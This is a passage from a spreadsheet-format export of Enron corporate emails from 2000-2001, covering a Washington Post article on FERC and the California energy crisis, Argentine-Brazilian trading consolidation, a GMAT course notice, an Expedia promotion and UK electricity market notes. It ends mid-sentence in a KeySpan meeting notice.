    <t>Thu, 27 Dec 2001 14:27:39 -0800 (PST)</t>
  </si>
  <si>
    <t>FYI - Contract Request for Approval:  #######, Route #</t>
  </si>
  <si>
    <t>Susan:_x000D_
Please note that Danny approves contracts on-line and several have come through this week.  In Danny's absence, Craig Buehler (x37312) or Karen Brostad (x6964) approve for Danny.  I left Danny a heads up when this process is done for him.  _x000D_
Thanks.</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/25/01; HourAhead hour: 16;  HourAhead schedule download failed. _x000D_
Manual intervention required.</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 08:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@ei.enron.com', 'jsteffe@enron.com', 'mmilner@coral-energy.com', 'rreilley@coral-energy.com', 'rshapiro@enron.com', 'acomnes@enron.com', 'smara@enron.com', 'gackerman@wptf.org', 'jdasovic@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Washington Post - FERC Taken to Task Over Calif. Energy	Crisis</t>
  </si>
  <si>
    <t>Content-Transfer-Encoding: quoted-printable_x000D_
Date: Fri, 27 Apr 2001 10:12:51 -0500_x000D_
From: "Tracey Bradley" &lt;tbradley@bracepatt.com&gt;_x000D_
To: "Aryeh Fishman" &lt;afishman@bracepatt.com&gt;, "Andrea Settanni" _x000D_
&lt;asettanni@bracepatt.com&gt;, "Deanna King" &lt;dking@bracepatt.com&gt;, "Dan Watkiss" _x000D_
&lt;dwatkiss@bracepatt.com&gt;, "Justin Long" &lt;jlong@bracepatt.com&gt;, "Kimberly _x000D_
Curry" &lt;kcurry@bracepatt.com&gt;, "Paul Fox" &lt;pfox@bracepatt.com&gt;, "Ronald _x000D_
Carroll" &lt;rcarroll@bracepatt.com&gt;_x000D_
Subject: Washington Post - FERC Taken to Task Over Calif. Energy Crisis_x000D_
Mime-Version: 1.0_x000D_
Content-Type: text/plain; charset=ISO-8859-1_x000D_
Content-Disposition: inline_x000D_
_x000D_
FYI_x000D_
_x000D_
FERC Taken to Task Over Calif. Energy Crisis_x000D_
_x000D_
By Peter Behr_x000D_
Washington Post Staff Writer_x000D_
Friday, April 27, 2001; Page E01_x000D_
_x000D_
_x000D_
Even before President Bush took office, he and his staff were trying keep _x000D_
California's energy crisis a long arm's length away, saying it was primarily _x000D_
California's problem to solve._x000D_
_x000D_
But the Bush White House inherited an unavoidable link to California: the _x000D_
Federal Energy Regulatory Commission, a relatively small Washington agency _x000D_
with a large mandate to see that wholesale electricity rates remain "just and _x000D_
reasonable."_x000D_
_x000D_
California's calamity is defined in part by a battle between FERC and state _x000D_
officials over what "just and reasonable" means._x000D_
_x000D_
On Wednesday, FERC made a new effort to hold down California's electricity _x000D_
prices without forsaking its commitment to energy deregulation, earning _x000D_
another round of sharp criticism from California officials. "FERC had a _x000D_
chance to bring meaningful relief to California's outrageous wholesale prices _x000D_
and they blew it," California Gov. Gray Davis (D) said yesterday._x000D_
_x000D_
The spotlight is bright and unsought for an agency with a modest $175 million _x000D_
budget, born in 1920 as the Federal Power Commission -- a weak, understaffed _x000D_
agency that promoted and supervised hydropower dams._x000D_
_x000D_
Fifteen year later, during President Franklin D. Roosevelt's New Deal battle _x000D_
against powerful utility holding companies, the commission was armed with the _x000D_
authority to regulate rates for wholesale electricity bought by utilities, _x000D_
and for power transmission. States regulate retail rates._x000D_
_x000D_
Today FERC makes rules for the nation's transition away from regulated _x000D_
utility electric service to a market-based hybrid. In California and many _x000D_
major states, powerful generating companies compete to sell electricity to _x000D_
utilities, which act as distributors._x000D_
_x000D_
The responsibilities have taxed FERC's staff of 1,200, which is about 10 _x000D_
percent less than peak levels during the mid-1990s._x000D_
_x000D_
A backlog of 2,000 pending cases includes not just conflicts over power _x000D_
prices, but also critical issues of reorganizing the nation's power _x000D_
transmission network into large regional pools strong enough to make urgently _x000D_
needed investments in new lines._x000D_
_x000D_
When Congress set electricity deregulation in motion in 1992, FERC's goal _x000D_
became seeing that it succeeded. Gradually, it redefined the "just and _x000D_
reasonable" standard, saying that as long as electricity markets were _x000D_
competitive, the prices negotiated by generators and distributors met the _x000D_
standard._x000D_
_x000D_
In hewing to that doctrine, the agency turned down an increasingly angry _x000D_
flood of demands from Davis and a host of California officials to clamp down _x000D_
on the state's wholesale electricity prices when they suddenly shot upward _x000D_
last summer._x000D_
_x000D_
Although FERC concluded in November that California's power market was badly _x000D_
flawed and that the potential for unfair and unjust pricing existed, it did _x000D_
not impose hard price restraints, opting for a "soft" partial price ceiling._x000D_
_x000D_
FERC ordered California to try to fix its broken power purchasing system by _x000D_
buying the bulk of its electricity through long-term supply contracts with _x000D_
generators, rather than through last-minute purchases that forced the state _x000D_
to pay generators' and marketers' top prices. But FERC's plan was not _x000D_
implemented._x000D_
_x000D_
"They have the ability to resolve it and they are not following through with _x000D_
what we asked them to," FERC Chairman Curt Hebert Jr. said three months ago, _x000D_
just after being named chairman by Bush._x000D_
_x000D_
But under growing political pressure to restrain California's extraordinary _x000D_
wholesale electricity charges and respond to complaints of overcharging, FERC _x000D_
has moved deeper into the morass._x000D_
_x000D_
Since March, it has ordered power suppliers to refund $124.5 million or prove _x000D_
that their charges were justified. The generators say their prices have been _x000D_
based on high costs of natural gas and air pollution permits._x000D_
_x000D_
"We're very confident that FERC . . . will see that these issues and _x000D_
transactions were just and reasonable," said Randy Harrison, chief executive _x000D_
for western operations of Mirant, a major California generator._x000D_
_x000D_
On Wednesday, the commission went further, directing California to establish _x000D_
maximum rates that generators could charge during power shortage emergencies _x000D_
through a formula linked to plant operating costs. All generators would be _x000D_
entitled to get the highest approved price, but suppliers that exceeded the _x000D_
price benchmark would have to justify their prices or face refund orders._x000D_
_x000D_
The decision, on a 2 to 1 vote, reflects a compromise between the agency's _x000D_
desire to defend the troubled experiment with deregulation while protecting _x000D_
consumers against overcharging, said energy consultant Peter Fox-Penner of _x000D_
the Brattle Group._x000D_
_x000D_
"They're searching for middle ground here. It's not what we think of as price _x000D_
caps," he said. "It's flexible. It's related to costs, and that's very _x000D_
innovative."_x000D_
_x000D_
But FERC's many critics in California rebuked the agency again yesterday, _x000D_
saying its actions were too little and too late._x000D_
_x000D_
Because the new FERC rules would apply only during power emergencies, there _x000D_
would be no price restraint at other times, some said._x000D_
_x000D_
And by pegging approved rates to the costs of plants burning costly natural _x000D_
gas, FERC's order would confront California with continuing costs of $300 per _x000D_
megawatt-hour for large quantities of electricity this summer, eight to 10 _x000D_
times what the state was paying before the crisis, critics said._x000D_
_x000D_
"What they did do is virtually irrelevant," said Harvey Rosenfield of the _x000D_
Foundation for Taxpayer &amp; Consumer Rights. "It's like offering someone who's _x000D_
been hit by a car an aspirin."_x000D_
_x000D_
"FERC has failed its responsibilities at every point in the crisis," said _x000D_
Adam Goldberg, a policy analyst with Consumers Union._x000D_
_x000D_
Hebert responds that slapping hard price regulations on California's energy _x000D_
market is the wrong course for at least three reasons: It does not encourage _x000D_
generators to build more plants, it doesn't prompt consumers to conserve _x000D_
energy and it will prompt power suppliers to sell electricity to neighboring _x000D_
states where prices aren't controlled -- unless California blocks power _x000D_
exports._x000D_
_x000D_
What lessons the public will draw from California's plight this summer and _x000D_
the deregulation debate remains to be seen, but FERC -- and perhaps the Bush _x000D_
administration too -- has been pulled more closely than ever into that drama._x000D_
_x000D_
Special correspondent Jeff Adler contributed to this article._x000D_
_x000D_
_x000D_
_x000D_
, 2001 The Washington Post Company</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brent.price@enron.com', 'james.new@enron.com', 'mike.jordan@enron.com', 'peggy.hedstrom@enron.com', 'sally.beck@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>consolidate report for 12/04 - additional information</t>
  </si>
  <si>
    <t xml:space="preserve">Please review and e-mail me your comments._x000D_
_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Oct 2001 12:28:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>NEON</t>
  </si>
  <si>
    <t xml:space="preserve">	 _x000D_
 - Awesome Agenda.doc </t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 11:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'allen.ueckert@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'michael.guerriero@enron.com'})</t>
  </si>
  <si>
    <t>Re: Argentina Trading in Brazil</t>
  </si>
  <si>
    <t xml:space="preserve">Mike, _x000D_
_x000D_
#4 -  I would expect that to the extent you continue to have activity in _x000D_
Argentina, especially Arcor, that it would be wise to keep one accounting _x000D_
person in BA.  We currently do not have anyone in SP that has both Brazil and _x000D_
Argentine statutory accounting experience.  I also believe that it would be _x000D_
somewhat difficult to find a person which would have this experience in _x000D_
Brazil.  Finally, since we already have someone in BA that understands the _x000D_
system and the business, it just makes sense, from a learning curve _x000D_
perspective,  to keep one of the current staff._x000D_
_x000D_
#1 - From an accounting point of view, the mechanics would not be a problem _x000D_
as we have SAP in SP as well, which is tied into Houston and BA.  However, _x000D_
the bigger problem, staffing to handle this,  is addressed above._x000D_
_x000D_
Let me know if you need further clarification._x000D_
_x000D_
Allen_x000D_
_x000D_
_x000D_
To: Lynn Aven/NA/Enron@Enron, Brent Hendry/NA/Enron@Enron, Andrea _x000D_
Calo/SA/Enron@Enron, Scott Mills@EES, Luis Juarros/SA/Enron@Enron, Allen W _x000D_
Ueckert/NA/Enron@Enron, Guillermo Canovas/SA/Enron@Enron, Cristian _x000D_
Folgar/SA/Enron@Enron, Rodolfo Freyre/SA/Enron@Enron, Julian _x000D_
Poole/SA/Enron@Enron_x000D_
cc: Joe Kishkill/SA/Enron@Enron, Orlando Gonzalez/SA/Enron@Enron, Miguel _x000D_
Padron/NA/Enron@ENRON, Remi Collonges/SA/Enron@Enron, Brett R _x000D_
Wiggs/SA/Enron@Enron, Mark Taylor@ECT, Carlos Bastos/SA/Enron@Enron _x000D_
_x000D_
Subject: Argentina Trading in Brazil_x000D_
_x000D_
We are in the process of working through the regional objective of _x000D_
consolidating intellectual capital I.E. we want Argentina trading activity to _x000D_
be consolidated into the Sao Paulo trading operations._x000D_
 _x000D_
1 What are the tax,  legal, regulatory, accounting and operational _x000D_
consequences of this move?_x000D_
_x000D_
2 Are there any commercial restrictions I need to be aware of?_x000D_
_x000D_
3 Are there any barriers to payments and receivable management? _x000D_
_x000D_
4 Could accounting be managed out of Brazil? _x000D_
_x000D_
5 Are there any Argentine banking requirements that would require the _x000D_
payables and receivable function to remain in Argentina?_x000D_
_x000D_
6 Are there any conflicts with Brazilian law or banking regulations?_x000D_
_x000D_
7 Is there any additional taxation exposure such as in  the case of the US as _x000D_
we decrease Argentina functional independence?_x000D_
_x000D_
8 Are there any Argentine regulatory conflicts with operating out of Brazil?_x000D_
_x000D_
9 Are there any Argentine legal conflicts with operating out of Brazil?_x000D_
_x000D_
10 How do we and can we operate Enron America del Sur S.A. and Enron _x000D_
Comercializadora de Energia S.A. out of Brazil?_x000D_
_x000D_
12 If necessary what functions need to remain in Argentina to resolve any _x000D_
legal, regulatory, accounting or tax issues?_x000D_
_x000D_
13 Can the stack managers be live in both Argentina and Brazil to resolve any _x000D_
identified issues? _x000D_
_x000D_
14 Are there any legal or tax advantages to the Brazilian operational _x000D_
structure?_x000D_
_x000D_
15 Mostly are there any fatal flaws I need to be aware of?_x000D_
_x000D_
Under this structure the stack managers for the following current and future _x000D_
products will ideally be operated in Brazil:_x000D_
_x000D_
Arg Gas  Onshore  Physical _x000D_
Arg Power Onshore  Physical Pending local derivatives company_x000D_
_x000D_
The stack manager for  Arg Power, Offshore, Financial will continue to be _x000D_
operated from North America as designed and agreed upon._x000D_
_x000D_
I need a quick readers digest version of what I am up against here. We can _x000D_
get into more details as we proceed._x000D_
_x000D_
Please advise ASAP (Monday morning if possible with the short version) so I _x000D_
can proceed with the best way to accomplish this organizational objective and _x000D_
corresponding structure._x000D_
_x000D_
MFG_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 06:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.shults@enron.com', 'louise.kitchen@enron.com', 'awais.omar@enron.com', 'sheri.thomas@enron.com', 'sally.beck@enron.com', 'david.forster@enron.com', 'rahil.jafry@enron.com'})</t>
  </si>
  <si>
    <t>EOL Summary Report 02-29-2000</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,_x000D_
_x000D_
Apologies for any delays, but Carrie is out sick. _x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 20:53:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>GMAT REVIEW AT ENRON_x000D_
_x000D_
The next GMAT review course at Enron will begin the week of October 15th._x000D_
Two schedules are being offered:_x000D_
	Course # 7129-00:  Tuesdays, Oct 16 - Dec 11 (no class Nov 20)_x000D_
	Course # 7129-01:  Thursdays, Oct 18 - Dec 13 (no class Nov 22)_x000D_
PLEASE NOTE that the two schedules are not interchangeable; employees should_x000D_
enroll in their preferred schedule and stick to that schedule._x000D_
_x000D_
Course details:_x000D_
	- Class is held at Enron in room ECN560 and is restricted to Enron employees_x000D_
	- Each course is limited to eight students_x000D_
	- Meets once a week for eight weeks_x000D_
	- Hours are 6:00-9:00 PM (first session will run til 10:00 pm to_x000D_
		include initial exam)_x000D_
	- Expect 4-5 hours of homework per week_x000D_
	- Course includes a total of four practice GMAT exams_x000D_
	- Ends the second week of December, allowing employees to take the_x000D_
		GMAT in December and meet a January application deadline._x000D_
	- Special discount of $200 off the regular Princeton Review tuition_x000D_
Enron has allowed this program to be hosted in the Enron Building for convenience of its employees.  Individuals are responsible for paying their own fees.  Financial support from Enron is at manager's discretion and is subject to the usual tuition reimbursement constraints around budget and relevance to organizational performance._x000D_
_x000D_
_x000D_
HOW TO ENROLL:_x000D_
	1.  Print out the attached registration form._x000D_
	2.  Complete the form, but please note the following _x000D_
		SPECIFIC INSTRUCTIONS:_x000D_
		A.  Fill out the student information completely, including_x000D_
			your email address._x000D_
		B.  In the Enrollment section, where it says "Please enroll_x000D_
			me in GMAT Class Size-8 Course # _________", _x000D_
			please indicate either course #7129-00 (Tuesdays) or # 7129-01 (Thursdays).  _x000D_
If you wish, you may indicate one course as your first choice and the other as your second choice._x000D_
		C.  In the Payment section:  For the course at Enron, the_x000D_
			tuition is discounted by $200, to $899.  _x000D_
			FULL PAYMENT of this amount by credit or debit card is required on the registration form.  _x000D_
			Be sure to indicate complete cardholder information._x000D_
	3.  Fax the completed form to Princeton Review at (713) 688-4746._x000D_
_x000D_
Faxes are time-stamped by the receiving fax machine at Princeton Review._x000D_
The first eight valid registration forms received for each course will be honored.  _x000D_
Registrations received after the first eight will be placed on awaiting list for the course or courses indicated._x000D_
Enrollments and waitlists will be confirmed by email._x000D_
_x000D_
Employees who are not able to take the course at Enron can take a course at_x000D_
the Princeton Review office at the same $200 discount.  _x000D_
The next courses at the Princeton Review office start the week of October 20.  _x000D_
Call (800)2REVIEW to register or for future schedules._x000D_
_x000D_
IMPORTANCE OF THE GMAT:_x000D_
	The GMAT score is a critical part of your application to business_x000D_
school.  Indeed, in many cases, it is the single most decisive statistic_x000D_
that admissions offices use in evaluating applicants.  While work_x000D_
experience, GPA, essays, and interviews are all important components of your_x000D_
application, the GMAT is the one objective factor that you can substantially_x000D_
improve in a short period of time._x000D_
_x000D_
THE TEXAS MBA TOUR:_x000D_
	All interested Enron employees are invited to attend the Texas MBA_x000D_
Tour, which will be in Houston on Wednesday, January 23. The Texas MBA Tour,_x000D_
of which The Princeton Review is a partner, is a group of six business_x000D_
schools that host a joint MBA panel discussion and admissions fair.  The_x000D_
participating schools are Texas, Rice, SMU, Baylor, TCU, and Texas A&amp;M.  The_x000D_
Princeton Review has agreed to handle registration for the event, so call_x000D_
(800) 2REVIEW to register._x000D_
_x000D_
http://home.enron.com:84/messaging/gmatregform.pdf</t>
  </si>
  <si>
    <t>Wed, 16 May 2001 07:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'faretracker_020273@expedia.customer-email.com'})</t>
  </si>
  <si>
    <t>Plan your summer vacation NOW: Tips and deals</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
	homeflightshotelscarspackagescruisesguidesmapsbusiness	_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]My Trips _x000D_
| _x000D_
[IMAGE]My Profile _x000D_
| _x000D_
[IMAGE]Customer Support _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
CONTENTS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
Deals &amp; News _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
Your Fares _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
Special Deals _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Tell a Friend!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Free issue!_x000D_
_x000D_
_x000D_
	[IMAGE]	 Dear peter, _x000D_
		_x000D_
		  Don't miss our handy summer vacation guides, for help planning your  best _x000D_
break ever -- whether you're into roller  coasters, national parks, or haute _x000D_
couture.  _x000D_
		_x000D_
		Summer family fun: Your guide to three thrilling cities kids and "perpetual _x000D_
kids" love -- Orlando, Anaheim, and San Diego.[IMAGE] Tell a friend! _x000D_
		_x000D_
		Summer in the great outdoors: Fresh-air frolics in some of  our favorite _x000D_
summer spots, from Maine to Hawaii.[IMAGE] Tell a friend!  _x000D_
		_x000D_
		Experience Europe: It's the ultimate summer vacation ... immerse yourself in _x000D_
the culture of London, Paris, and Rome. [IMAGE] Tell a friend! _x000D_
		_x000D_
		[IMAGE]_x000D_
		DEALS &amp; NEWS_x000D_
		[IMAGE]_x000D_
		 Every week, we bring you the latest fare sales and travel updates so you can _x000D_
make exactly the right travel choices. _x000D_
		_x000D_
		Save up to 15% when you rent a car_x000D_
		Do your summer vacation plans include a road trip? Rent  from Avis on _x000D_
Expedia.com and you'll save up to 15% on  premium cars and up to 10% on other _x000D_
car classes.  _x000D_
		_x000D_
		NEW: Restaurant reviews on Expedia.com!_x000D_
		Want sushi in San Francisco or jambalaya in New Orleans?  Get a taste of the _x000D_
very best eats in 125 cities around the world, with our new restaurant _x000D_
reviews from Fodors.com. _x000D_
		_x000D_
		Roundtrip flights as low as $78_x000D_
		Plan your summer travel now, and you'll save on US Airways  flights. Buy your _x000D_
ticket by May 24 and travel through  September 10, 2001.   _x000D_
		_x000D_
		[IMAGE]_x000D_
		_x000D_
		_x000D_
		www.expedia.com_x000D_
		[IMAGE]_x000D_
		_x000D_
		SELECT FARE TRACKER ROUTES_x000D_
		[IMAGE]_x000D_
		Please select your routes _x000D_
		We've noticed that you don't have Fare Tracker routes  selected. Put Fare _x000D_
Tracker to work for you today, and we'll keep you updated on the best fares, _x000D_
every week! Here's how  it works: _x000D_
		_x000D_
		You choose your three favorite routes  (example: Chicago to New York). _x000D_
		We search the airlines to find the lowest published  fares for your routes, _x000D_
and give you the range of fares  found recently by other Expedia.com _x000D_
travelers.  _x000D_
		We send the results right to your inbox!_x000D_
		_x000D_
		Just click the link below, sign in with your member ID and password, and _x000D_
select virtually any airport in the world. _x000D_
		Select Fare Tracker routes now _x000D_
		_x000D_
		     Need more information?_x000D_
		[IMAGE]What does Airlines' Lowest Published Fare mean?_x000D_
		[IMAGE]Want to change your Fare Tracker routes?_x000D_
		[IMAGE]Check out all your route and fare options with our Flight Wizard._x000D_
		[IMAGE]Visit Airline Fare List to check out the airlines' published fares on _x000D_
any route. _x000D_
		[IMAGE]_x000D_
		[IMAGE]_x000D_
		 _x000D_
		_x000D_
		_x000D_
		www.expedia.com_x000D_
		[IMAGE]_x000D_
		_x000D_
		SPECIAL DEALS_x000D_
		[IMAGE]_x000D_
		Best Deals _x000D_
		The best offers and promotions at Expedia.com, handpicked to bring you _x000D_
exciting opportunities and excellent value._x000D_
		_x000D_
		   _x000D_
		_x000D_
		Expedia Vacation Packages: Four nights in Orlando as low as $327_x000D_
		You'll get air, four nights at the Delta Resort, and free shuttles! _x000D_
		_x000D_
		Expedia Special Rate: Reno's Circus Circus from $35 until June 28_x000D_
		Newly renovated, with an elegant turn-of-the-century circus feel. _x000D_
		_x000D_
		Expedia Cruises: Seven-day New England cruise (New York roundtrip) from $484_x000D_
		A cool summer sail to Nova Scotia, Bar Harbor, Martha's Vineyard, and more. _x000D_
		_x000D_
		Away.com: Raft the Colorado River in Westwater Canyon and save $102!_x000D_
		Three days of world-class whitewater and stunning scenery.  _x000D_
		_x000D_
		                    [IMAGE]_x000D_
		[IMAGE]_x000D_
		_x000D_
		Thank you for traveling with Expedia.com. _x000D_
		_x000D_
		Expedia.com Travel Team_x000D_
		_x000D_
		Don't just travel. Travel Right.TM_x000D_
		_x000D_
		http://expedia.com/_x000D_
		_x000D_
		[IMAGE]_x000D_
		    FROM OUR SPONSORS: _x000D_
		_x000D_
		Save up to $75 on domestic air travel with Expedia.com !_x000D_
		_x000D_
		Sign up for Sprint long distance and save on tickets from Expedia.com. With _x000D_
Sprint Nickel Nights(sm) you can talk for only 5? a minute on state-to-state _x000D_
calls from 7 PM to 7 AM at a low monthly rate of $5.95. For details, click _x000D_
here. _x000D_
		_x000D_
		[IMAGE][IMAGE]_x000D_
		[IMAGE]_x000D_
		_x000D_
		_x000D_
		The airlines' lowest published fares are the lowest roundtrip fares published _x000D_
by the airlines for your routes. These fares may not be available on the days _x000D_
you wish to travel. Our Fare Calendar  shows you when these fares are _x000D_
available.  _x000D_
		_x000D_
		The range of recent fare prices found by Expedia.com customers--the lowest _x000D_
and highest fares found for your routes--can help you determine the ideal _x000D_
price for your route. _x000D_
		_x000D_
		All prices are quoted in US Dollars. _x000D_
		_x000D_
		About this mailing: You are receiving this e-mail because you are a _x000D_
registered member of Expedia.com. _x000D_
		_x000D_
		Questions? Visit the Expedia.com Customer Support Center. _x000D_
		_x000D_
		If you do not wish to receive any further Fare Tracker e-mails from us, _x000D_
please reply to this mail with "unsubscribe" in the subject line. _x000D_
		_x000D_
		If you have questions or want to give us feedback, please click here. _x000D_
		_x000D_
		,2001 Expedia, Inc. All rights reserved. _x000D_
		_x000D_
		</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 12:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peter.styles@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Bullets for Kean Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Here's an attempt at some key "lessons" from CA to the UK (or vice versa as _x000D_
the case may be).  Actually they are more themes/differences/comments coming _x000D_
out of the CA experience, which will need tailoring/trimming down to fit the _x000D_
context of the actual presentation.  As I've indicated, depending on the _x000D_
point being presented, there may be a need for some caution in using the _x000D_
examples in too simplistic a context._x000D_
_x000D_
? Barriers to generator entry._x000D_
? Apart from the moratorium, it has been relatively easy to gain consent to _x000D_
construct new generation in the UK.  This is clearly a good thing in itself, _x000D_
but there are some potential pitfalls in just asserting this.  The entry has _x000D_
been criticised as unecessary in a market with significant overcapacity _x000D_
(indeed this was one of the justifications for the moratorium) and had _x000D_
surprisingly little impact on price for at least the first 8 years of the _x000D_
Pool. Indeed prices only fell once NP/PG divested plant.  Hence it would be _x000D_
easy to retort that new capacity was not required in the UK, the entry that _x000D_
did occur was wasteful and that the CA analogy is bogus (although clearly the _x000D_
full story is more complex than this)_x000D_
? Moratorium had a significant impact on investment and stalled competition.  _x000D_
(True, but difficult to sustain given that divestment and pre-committed new _x000D_
entry ensured that prices fell significantly before the moratorium was _x000D_
lifted.)_x000D_
? Danger that measures designed to meet the CHP and Renewables targets _x000D_
constrain future developments and lead to capacity shortages, ie, perfection _x000D_
should not be the enemy of the good.  This is not the case currently.  _x000D_
However, new applications must demonstrate that CHP has been fully explored - _x000D_
if this hurdle acquires real teeth (or turns into something more formal) then _x000D_
we could see easy consents getting significantly more difficult.  This is, _x000D_
however, largely speculation at the current time._x000D_
_x000D_
? Retail caps_x000D_
? Purchase costs could be passed through in UK (for at least the first 8 _x000D_
years).  Although some purchase costs were pseudo-regulated (through the _x000D_
vesting contracts and their replacements),  the Public Electricity Suppliers _x000D_
also purchased power from CCGTs in which they also took equity at very high _x000D_
prices.  (Teesside was one of the first examples of this.) The cost of this _x000D_
was passed through to franchise customers.  This was widely criticised and _x000D_
although the regulator allowed this to happen (on the grounds of entry _x000D_
promoting competition), the fact that all the entry was baseload and NP/PG _x000D_
still controlled the marginal plant meant that wholesale market prices didn't _x000D_
change at all._x000D_
? Since 1998, prices caps have been instituted and have not been a problem.  _x000D_
Although the caps squeezed the PES margins, they could contract forward to _x000D_
hedge the risk of wholesale price movements.  Morever, the price caps have _x000D_
actually reduce wholelsale prices - generator market power meant that the _x000D_
wholesale price was, in part, a net-back from the allowed retail tariff._x000D_
? Watch out for Independent Energy, a supplier who did go bankrupt.  This was _x000D_
due to a combination of being under-hedged when power prices rose and not _x000D_
having adequate infrastructure to bill customers and get the cash in._x000D_
_x000D_
? Competition_x000D_
? Generator concentration meant excessive prices for the first 8-9 years of _x000D_
the Pool.  Restructuring and divestment was essential to realising the _x000D_
benefits of competition._x000D_
? Retail competition has been very successful and has been a key driver in _x000D_
increasing liquidity in the wholesale market_x000D_
_x000D_
_x000D_
? Stranded Costs_x000D_
? Stranded cost recovery largely didn't distort the market, eg, nuclear levy, _x000D_
vesting contracts did not affect marginal decisions.  (That said market power _x000D_
provided a very soft landing and the market was clearly stitched up to meet _x000D_
the needs of the miners for years.)_x000D_
_x000D_
Hope these help.  Please let me know if you need anything further._x000D_
_x000D_
Cheers,_x000D_
_x000D_
Paul_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 10:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sandra.freeman@enron.com'})</t>
  </si>
  <si>
    <t>New Master Swaps Agreements Database</t>
  </si>
  <si>
    <t>Tana,_x000D_
_x000D_
I have had a request from Michael Khajeh-Noori, Deepak Sitlani (London) and _x000D_
Michael Schuh  (Frankfurt) to access to the NEW Master Swap Agreements _x000D_
database, can you please confirm if they are allowed to access this database, _x000D_
and if so what level of access they should have._x000D_
_x000D_
Thanks &amp; Regards_x000D_
_x000D_
Sandra Freeman_x000D_
European Notes Administration</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mbauer@keyspanenergy.com'})</t>
  </si>
  <si>
    <t>frozenset({'cahoonc@conedsolutions.com', 'gasmaster@worldnet.att.net', 'mduggan@hess.com', 'mcasas@hess.com', 'rebecca.schaefer@acnenergy.com', 'columbiautil@mindspring.com', 'dsmollett@lynbrookvillage.com', 'vferreira@r-techenergy.com', 'lcampbel@enron.com', 'ehudson@allenergy.com', 'info@ffcenergy.com', 'info@orionenergyservices.com', 'enrgn@aol.com', 'dowens@mitchellsupreme.com', 'jschultz@hess.com', 'end.nat@prodigy.net', 'cbender@colonialenergy.com', 'john.huffman@acnenergy.com', 'pbaratz@totalnrg.com', 'mtrombetta@castlepower.com', 'jgarofalow@castlepower.com', 'pkelly@castleoil.com', 'ehaley@ucmohio.com', 'mark.warno@acnenergy.com', 'jthomas@allenergy.com', 'slayne@castleoil.com', 'joe.galinanas@acnenergy.com', 'lsmorris@metromediaenergy.com', 'clombardi@cooplink.net', 'elden.condie@acnenergy.com', 'sfilgaras@colonialenergy.com', 'matthew.fleming@enron.com', 'clombardi@advanix.net', 'austina@conedsolutions.com', 'ysanchez@castleoil.com', 'aabbate@metromediaenergy.com', 'george.rahal@acnpower.com', 'tcampo@njne.com', 'mnaeser@naenergy.com', 'quartiersm@nmenergy.com', 'dstreed@naenergy.com', 'pprezorski@metromediaenergy.com', 'gasinfo@stuyfuel.com', 'hansenr@conedsolutions.com', 'metroenergy@worldnet.att.net', 'dhealey@allenergy.com', 'tkain@worldnet.att.net', 'cfurtado@beaconenergy.com', 'ufogel@aol.com', 'rtopolski@txuenergy.com', 'lurie@nmenergy.com', 'karonne@metromediaenergy.com', 'rlukas@keyspanenergy.com', 'akozak@mitchellsupreme.com', 'tnutt@naenergy.com', 'kinneary@bellatlantic.net', 'saulh@econnergy.com', 'geec2000@aol.com', 'cdonohue@worldnet.att.net', 'sjfuel@mindspring.com', 'intenergy@aol.com', 'cmanger@hess.com', 'cruikshankk@conedsolutions.com', 'brownsfuel@mindspring.com', 'jross@hess.com', 'spendegr@enron.com', 'ralbanese@allenergy.com', 'cbender22@aol.com'})</t>
  </si>
  <si>
    <t>Winter Capacity</t>
  </si>
  <si>
    <t>KeySpan Energy Delivery of New York and Long Island will be conducting a_x000D_
meeting in our Metrotech Brooklyn offices on Wednesday, May 16th to_x000D_
discuss our proposed winter capacity program. I have attached a brief_x000D_
overview of the proposed program for your review. It is important for_x000D_
you as an active gas Marketer in KeySpan's service territory to have the_x000D_
appropriate representative of your company attend this important_x000D_
meeting. This will be your opportunity to present your views as well as_x000D_
have any operational questions answered. The meeting will begin at 10:00_x000D_
am and a light continental breakfast will be served. To confirm your_x000D_
